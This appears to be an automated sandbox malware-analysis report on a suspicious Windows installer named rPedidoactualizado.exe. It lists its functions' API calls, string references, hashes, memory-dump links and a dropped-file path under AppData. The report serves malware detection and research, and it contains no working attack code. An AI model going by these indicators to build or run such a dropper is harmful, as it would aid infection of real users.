Associated: 00000000.00000002.2059221530.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059805170.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rPedidoactualizado.jbxd

Similarity

API ID: CreateInstance
String ID: C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen
API String ID: 542301482-2712461677
Opcode ID: 47d0b6cfbb01b3f03f9c85bf81605092c369e934b5dec228f075aa53eaa66100
Instruction ID: 8dfa29a236a07f1275cc6a79af1154fb3a8ffb17113c9066b1df84c51f017d98
Opcode Fuzzy Hash: 47d0b6cfbb01b3f03f9c85bf81605092c369e934b5dec228f075aa53eaa66100
Instruction Fuzzy Hash: 4F413A71A00208AFCF04DFE4C988A9D7BB5FF48314B24457AF915EB2E1DBB99981CB54

Function 004043CD Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 204windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040446B
GetDlgItem.USER32(?,000003E8), ref: 0040447F
SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040449C
GetSysColor.USER32(?), ref: 004044AD
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004044BB
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004044C9
lstrlenW.KERNEL32(?), ref: 004044CE
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004044DB
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004044F0
GetDlgItem.USER32(?,0000040A), ref: 00404549
SendMessageW.USER32(00000000), ref: 00404550
GetDlgItem.USER32(?,000003E8), ref: 0040457B
SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004045BE
LoadCursorW.USER32(00000000,00007F02), ref: 004045CC
SetCursor.USER32(00000000), ref: 004045CF
LoadCursorW.USER32(00000000,00007F00), ref: 004045E8
SetCursor.USER32(00000000), ref: 004045EB
SendMessageW.USER32(00000111,00000001,00000000), ref: 0040461A
SendMessageW.USER32(00000010,00000000,00000000), ref: 0040462C

Strings

DC@, xrefs: 004045D7
N, xrefs: 00404569
: Completed, xrefs: 004045AA

Memory Dump Source

Source File: 00000000.00000002.2059192300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2059174986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059206568.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059805170.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rPedidoactualizado.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
String ID: : Completed$DC@$N
API String ID: 3103080414-907034273
Opcode ID: 2da216cdb10da56fdc38759a2ba284d26a9c8f7b49192765219d3b76b1da507d
Instruction ID: 7c305bb631aa8564409a9791ba7e53f932479190766108f73685c8e55a50eb1d
Opcode Fuzzy Hash: 2da216cdb10da56fdc38759a2ba284d26a9c8f7b49192765219d3b76b1da507d
Instruction Fuzzy Hash: 3B61A0B1900209BFDF10AF60DD45AAA7B69FB85344F00843AF701B61E0D77DA951CF98

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectW.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextW.USER32(00000000,007A7A20,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000000.00000002.2059192300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2059174986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059206568.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059805170.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rPedidoactualizado.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: 218f2c87b148b58c94c6785b51cf5afc075c1faf60bc5df3e6f759b2377d660f
Instruction ID: 0958fbfe94b1809001ec2c76305b3cf500f7264b01c73c256976ee1787a3906e
Opcode Fuzzy Hash: 218f2c87b148b58c94c6785b51cf5afc075c1faf60bc5df3e6f759b2377d660f
Instruction Fuzzy Hash: B1418C71800209AFCF058F95DE459AF7BB9FF45310F00842AF591AA1A0CB38D954DFA4

Function 00405EE3 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130memorystringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,0040607E,?,?), ref: 00405F1E
GetShortPathNameW.KERNEL32(?,007A55C0,00000400), ref: 00405F27

Part of subcall function 00405CF2: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FD7,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D02
Part of subcall function 00405CF2: lstrlenA.KERNEL32(00000000,?,00000000,00405FD7,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D34

GetShortPathNameW.KERNEL32(?,007A5DC0,00000400), ref: 00405F44
wsprintfA.USER32 ref: 00405F62
GetFileSize.KERNEL32(00000000,00000000,007A5DC0,C0000000,00000004,007A5DC0,?,?,?,?,?), ref: 00405F9D
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405FAC
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FE4
SetFilePointer.KERNEL32(0040A560,00000000,00000000,00000000,00000000,007A51C0,00000000,-0000000A,0040A560,00000000,[Rename],00000000,00000000,00000000), ref: 0040603A
GlobalFree.KERNEL32(00000000), ref: 0040604B
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00406052

Part of subcall function 00405D8D: GetFileAttributesW.KERNELBASE(?,00402F1D,C:\Users\user\Desktop\rPedidoactualizado.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D91
Part of subcall function 00405D8D: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DB3

Strings

[Rename], xrefs: 00405FCC, 00405FDE
%ls=%ls, xrefs: 00405F58

Memory Dump Source

Source File: 00000000.00000002.2059192300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2059174986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059206568.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059805170.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rPedidoactualizado.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
String ID: %ls=%ls$[Rename]
API String ID: 2171350718-461813615
Opcode ID: 210d5d9a443b3001b4c7cda13cc78adcf358d44dd1d7e4f25ad0eda9c69d4b7c
Instruction ID: 42876e8bd8e74e9ce15c52ab3024c97c29192655820983ae090f8c600f4dcad6
Opcode Fuzzy Hash: 210d5d9a443b3001b4c7cda13cc78adcf358d44dd1d7e4f25ad0eda9c69d4b7c
Instruction Fuzzy Hash: 25312530240B156BD220BB218D48F6B3A9DEF86744F15003AFA42F62D1EA7DD8148ABD

Function 0040652B Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\rPedidoactualizado.exe",00403347,C:\Users\user\AppData\Local\Temp\,75923420,004035B6,?,00000006,00000008,0000000A), ref: 0040658E
CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 0040659D
CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\rPedidoactualizado.exe",00403347,C:\Users\user\AppData\Local\Temp\,75923420,004035B6,?,00000006,00000008,0000000A), ref: 004065A2
CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\rPedidoactualizado.exe",00403347,C:\Users\user\AppData\Local\Temp\,75923420,004035B6,?,00000006,00000008,0000000A), ref: 004065B5

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 0040652C, 00406531
"C:\Users\user\Desktop\rPedidoactualizado.exe", xrefs: 0040652B
*?|<>/":, xrefs: 0040657D

Memory Dump Source

Source File: 00000000.00000002.2059192300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2059174986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059206568.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059805170.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rPedidoactualizado.jbxd

Similarity

API ID: Char$Next$Prev
String ID: "C:\Users\user\Desktop\rPedidoactualizado.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-4032566419
Opcode ID: f2dbc7d310367101a7bf5127f564121aa95c210a65fb008c6410ea5a4ac792ac
Instruction ID: 354a4add7e9ac5ce680480da4fd3ed99b8030fd96c8c1ffbe99f836226306b46
Opcode Fuzzy Hash: f2dbc7d310367101a7bf5127f564121aa95c210a65fb008c6410ea5a4ac792ac
Instruction Fuzzy Hash: 4511B655800612A5DF303B14AD44A7772F8EF547A0F56443FE985733C4E77C5C9286AD

Function 00404275 Relevance: 12.1, APIs: 8, Instructions: 68COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 00404292
GetSysColor.USER32(00000000), ref: 004042D0
SetTextColor.GDI32(?,00000000), ref: 004042DC
SetBkMode.GDI32(?,?), ref: 004042E8
GetSysColor.USER32(?), ref: 004042FB
SetBkColor.GDI32(?,?), ref: 0040430B
DeleteObject.GDI32(?), ref: 00404325
CreateBrushIndirect.GDI32(?), ref: 0040432F

Memory Dump Source

Source File: 00000000.00000002.2059192300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2059174986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059206568.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059805170.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rPedidoactualizado.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
Instruction ID: 595a5ac3551c8926a474018cd00e052a0643935c19338169816fcf7950983a94
Opcode Fuzzy Hash: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
Instruction Fuzzy Hash: BD2135716007049FCB219F68DD48B5BBBF8AF81715B048A3EED96A26E0D734E944CB54

Function 0040264A Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(?,?,?,?), ref: 004026B6
MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004026F1
SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402714
MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 0040272A

Part of subcall function 00405E6E: SetFilePointer.KERNEL32(?,00000000,00000000,00000001,?,00000000,?,?,0040262F,00000000,00000000,?,00000000,00000011), ref: 00405E84

SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 004027D6

Strings

9, xrefs: 00402699

Memory Dump Source

Source File: 00000000.00000002.2059192300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2059174986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059206568.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059805170.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rPedidoactualizado.jbxd

Similarity

API ID: File$Pointer$ByteCharMultiWide$Read
String ID: 9
API String ID: 163830602-2366072709
Opcode ID: d48387ae3e024a72c6243637e6df33ec40d1b18911dabf8db30d8cce87806c70
Instruction ID: 60624729709df044e3b9a276a2138f1bd207bb457e97f94edfd4483e5cf9eee0
Opcode Fuzzy Hash: d48387ae3e024a72c6243637e6df33ec40d1b18911dabf8db30d8cce87806c70
Instruction Fuzzy Hash: 61510974D10219AEDF219F95DA88AAEB779FF04304F50443BE901F72D0DBB89982CB58

Function 00404BC9 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404BE4
GetMessagePos.USER32 ref: 00404BEC
ScreenToClient.USER32(?,?), ref: 00404C06
SendMessageW.USER32(?,00001111,00000000,?), ref: 00404C18
SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404C3E

Strings

f, xrefs: 00404C1A

Memory Dump Source

Source File: 00000000.00000002.2059192300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2059174986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059206568.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059805170.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rPedidoactualizado.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
Instruction ID: e2d68be7770c43893e1e2478522bb0d44a2fa382b0b36792216c84cf33d7cb12
Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
Instruction Fuzzy Hash: 6F015E71D00218BAEB00DB94DD85BFFBBBCAF95B11F10412BBA51B61D0C7B49A018BA4

Function 00402DF3 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402E11
MulDiv.KERNEL32(000A8699,00000064,000A9040), ref: 00402E3C
wsprintfW.USER32 ref: 00402E4C
SetWindowTextW.USER32(?,?), ref: 00402E5C
SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E6E

Strings

verifying installer: %d%%, xrefs: 00402E46

Memory Dump Source

Source File: 00000000.00000002.2059192300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2059174986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059206568.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059805170.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rPedidoactualizado.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: 1a328351c5421bd6383489faae0abdae529a3cf17d73acb180239156b2535a4a
Instruction ID: 3b7df5e00b9d055b55134e233a6447c2e1405f162d6c23549fa63679cea1b34f
Opcode Fuzzy Hash: 1a328351c5421bd6383489faae0abdae529a3cf17d73acb180239156b2535a4a
Instruction Fuzzy Hash: 5601677164020CBFDF109F50DD49FAE3B69AB04305F108439FA05B51E0DBB98555CF58

Function 004028AD Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402901
GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 0040291D
GlobalFree.KERNEL32(?), ref: 00402956
GlobalFree.KERNEL32(00000000), ref: 00402969
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402981
DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402995

Memory Dump Source

Source File: 00000000.00000002.2059192300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2059174986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059206568.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059805170.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rPedidoactualizado.jbxd

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
